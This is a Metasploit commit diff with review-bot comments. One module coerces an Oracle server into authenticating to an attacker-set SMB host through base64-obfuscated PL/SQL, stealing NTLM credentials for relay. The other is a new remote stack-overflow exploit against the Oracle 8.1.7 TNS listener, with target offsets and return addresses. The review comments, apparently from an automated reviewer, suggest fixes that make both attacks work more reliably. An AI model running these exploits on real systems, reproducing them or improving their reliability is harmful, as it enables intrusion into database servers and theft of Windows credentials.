added exploit module tns_service_name.rb. updated ora_ntlm_stealer.rb to use the new mixin.
git-svn-id: file:///home/svn/framework3/trunk@6804 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
6624dbd5ff
commit
6005ac7c3f
|
@ -1,80 +1,82 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Owning Windows server using Oracle database unpivileged user',
|
||||
'Description' => %q{
|
||||
This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges)
|
||||
To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to
|
||||
Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS.
|
||||
So if smb_relay is working you will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash.
|
||||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
|
||||
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
|
||||
|
||||
],
|
||||
'DisclosureDate' => 'April 7 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
|
||||
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
|
||||
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
|
||||
prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
|
||||
prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
|
||||
|
||||
exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
|
||||
|
||||
prp = Rex::Text.encode_base64(prepare)
|
||||
prp1 = Rex::Text.encode_base64(prepare1)
|
||||
exp1 = Rex::Text.encode_base64(exploiting1)
|
||||
|
||||
sql = %Q|
|
||||
DECLARE
|
||||
#{rand1} VARCHAR2(32767);
|
||||
#{rand2} VARCHAR2(32767);
|
||||
#{rand3} VARCHAR2(32767);
|
||||
BEGIN
|
||||
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
|
||||
EXECUTE IMMEDIATE #{rand1};
|
||||
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
|
||||
EXECUTE IMMEDIATE #{rand2};
|
||||
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
|
||||
EXECUTE IMMEDIATE #{rand3};
|
||||
END;
|
||||
/
|
||||
|
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sql)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::ORACLE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Owning Windows server using Oracle database unpivileged user.',
|
||||
'Description' => %q{
|
||||
This module will help you to get Administrator access to OS using unprivileged
|
||||
Oracle database user (you need only CONNECT and RESOURCE privileges)
|
||||
To do this you must firstly run smb_sniffer of smb_relay module on your sever.
|
||||
Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb
|
||||
which will connect to your SMB sever with credentials of Oracle RDBMS.
|
||||
So if smb_relay is working you will get Administrators access to server which runs
|
||||
Oracle of not than you can decrypt HALFLM hash.
|
||||
},
|
||||
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
|
||||
],
|
||||
'DisclosureDate' => 'Apr 7 2009'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
|
||||
|
||||
prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
|
||||
prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
|
||||
|
||||
exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
|
||||
|
||||
prp = Rex::Text.encode_base64(prepare)
|
||||
prp1 = Rex::Text.encode_base64(prepare1)
|
||||
exp1 = Rex::Text.encode_base64(exploiting1)
|
||||
|
||||
sql = %Q|
|
||||
DECLARE
|
||||
#{rand1} VARCHAR2(32767);
|
||||
#{rand2} VARCHAR2(32767);
|
||||
#{rand3} VARCHAR2(32767);
|
||||
BEGIN
|
||||
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
|
||||
EXECUTE IMMEDIATE #{rand1};
|
||||
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
|
||||
EXECUTE IMMEDIATE #{rand2};
|
||||
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
|
||||
EXECUTE IMMEDIATE #{rand3};
|
||||
END;
|
||||
|
|
||||
|
||||
begin
|
||||
print_status("Executing #{self.name}...")
|
||||
prepare_exec(sql)
|
||||
rescue => e
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
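Review bot: The `rescue => e` / `return` at the end of run() in the new ORACLE-mixin version swallows every failure of prepare_exec silently — a login failure, a missing CTXSYS grant on the target or a syntax error in the generated PL/SQL all produce the same empty output, and `e` is never used. Report before bailing out: `rescue => e` / `print_error("Failed to execute PL/SQL block: #{e}")` / `return`. The `IP` option also remains optional with a default of `0.0.0.0`, so a user who forgets to set it makes the server resolve the UNC path `\\0.0.0.0\SHARE`, which can never reach their SMB capture listener; marking it required, `OptString.new('IP', [ true, 'IP address of the SMB capture/relay host.' ])`, fails early instead. The table and CONTEXT index created on the target (`name1`, `name2`) are never dropped, so each run leaves random-named objects behind in the user's schema; a follow-up `DROP INDEX`/`DROP TABLE` or at least a note in the description would help operators clean up.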
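--- /dev/null
+++ b/tns_service_name.rb
@@ -0,0 +1,95 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+include Msf::Exploit::Remote::TNS
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.',
+'Description' => %q{
+This module exploits a stack overflow in Oracle. When
+sending a specially crafted packet containing a long SERVICE_NAME
+to the TNS service, an attacker may be able to execute arbitrary code.
+},
+'Author' => [ 'MC' ],
+'License' => MSF_LICENSE,
+'Version' => '$Revision:$',
+'References' =>
+[
+[ 'BID', '4845'],
+[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml' ],
+[ 'URL', 'http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf' ],
+],
+'Privileged' => true,
+'DefaultOptions' =>
+{
+'EXITFUNC' => 'thread',
+},
+'Payload' =>
+{
+'Space' => 600,
+'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
+'StackAdjustment' => -3500,
+},
+'Platform' => 'win',
+'Targets' =>
+[
+[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Offset' => 6396, 'Ret' => 0x60a1e154 } ],
+[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)', { 'Offset' => 6392, 'Ret' => 0x60a1e154 }] ,
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'May 27 2002'))
+
+register_options([Opt::RPORT(1521)], self.class)
+
+end
+
+def check
+connect
+
+version = "(CONNECT_DATA=(COMMAND=VERSION))"
+
+pkt = tns_packet(version)
+
+sock.put(pkt)
+
+sock.get_once
+
+res = sock.get_once(-1, 1)
+
+disconnect
+
+if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
+return Exploit::CheckCode::Vulnerable
+end
+return Exploit::CheckCode::Safe
+end
+
+def exploit
+connect
+
+buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
+buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
+buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400)
+
+sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))"
+
+pkt = tns_packet(sploit)
+
+print_status("Trying target #{target.name}...")
+sock.put(pkt)
+
+handler
+
+disconnect
+end
+
+end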
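Review bot: The connect descriptor built into `sploit` in exploit() is malformed — `(HOST=#{rhost}(PORT=#{rport}))` nests PORT inside HOST and consumes the parenthesis that should close HOST, so the whole string has nine opening and eight closing parentheses and the ADDRESS list is never closed. It should read `(HOST=#{rhost})(PORT=#{rport}))`, which restores the standard `(ADDRESS=(PROTOCOL=TCP)(HOST=...)(PORT=...))` form and balances the string. Whether the 8.1.7 listener copies SERVICE_NAME into the fixed buffer before it notices the imbalance is not visible from this file, so the offsets in the target table may still be reached, but a well-formed descriptor removes that dependency and matches the VERSION probe style used in check(). As a point of style, the `BadChars` list spells `: & ? % # space / + \` twice, once as `\x` escapes and once literally; deduplicating it avoids a reader wondering whether the two sets differ.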